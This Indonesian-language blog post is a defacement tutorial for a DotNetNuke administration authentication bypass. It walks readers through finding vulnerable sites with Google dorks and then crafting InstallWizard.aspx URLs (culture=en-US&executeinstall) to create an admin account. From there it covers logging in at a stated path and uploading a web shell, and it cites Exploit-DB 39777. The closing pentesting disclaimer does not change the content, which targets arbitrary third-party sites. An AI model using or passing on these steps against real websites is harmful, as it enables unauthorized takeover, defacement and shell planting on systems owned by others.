DotNetNuke - Administration Authentication Bypass

DotNetNuke - Administration Authentication Bypass

Assalamualaikum Wr.Wb
Baiklah bertemu lagi dengan saya Adewa (Mr.Adewa)
Terimakasih telah berkunjung ke web sederhanan ini. Hehe
Kali ini saya akan memberikan Tutorial Deface metode DotNetNuke - Administration Authentication Bypass

Sebelum deface sebaiknya kita mempersiapkan alat dan bahan
-Shel sendiri sendiri

-Script deface (saya rasa udah punya sendiri sendiri)
-Exploit number 39777
https://www.exploit-db.com/exploits/39777/
-Dork
Use Your Brain

Langsung saja simak tutorialnya
1. Dorking site dulu di google

2. Jika sudah masukkan exploitnya menjadi seperti ini
site.co.li/Install/InstallWizard.aspx?__VIEWSTATE= 
3. Jika ada register. Kalian register aja dengan benar

4. Jika sudah hapus  __VIEWSTATE=

5. Dan tambahkan culture=en-US&executeinstall pada bagian aspx menjadi seperti ini
site.co.li/Install/InstallWizard.aspx?culture=en-US&executeinstall
6.  Langkah terakhir tinggal login saja
untuk login ada 2 yaitu di default web utama dan menggunakan exploit satu ini
/Home/tabid/36/ctl/Login/Default.aspx 
7. Masukkan username dan password yg kalian daftarkan tadi

8. Jika sudah login cari tempat upload shell





9. Selamat anda sudah menjadi hacker

Jika masih kurang jelas bisa Lihat tutor di bawah ini


Jangan lupa baca juga
Catatan. Saya Admin tidak pernah bertanggung jawab dengan apa yang kalian perbuat
Jika ada masalah jangan pernah menyalakan website ini 
Tutor ini di buat untuk mengetest/pentester suatu website apakah web itu memiliki bug apa enggak
Mungkin hanya itu kata kata yg bisa saya ucapkan 

Sekian dan Terimakasih
Wassalamualaikum Wr.Wb

Subscribe to receive free email updates:

0 Response to "DotNetNuke - Administration Authentication Bypass"

Post a Comment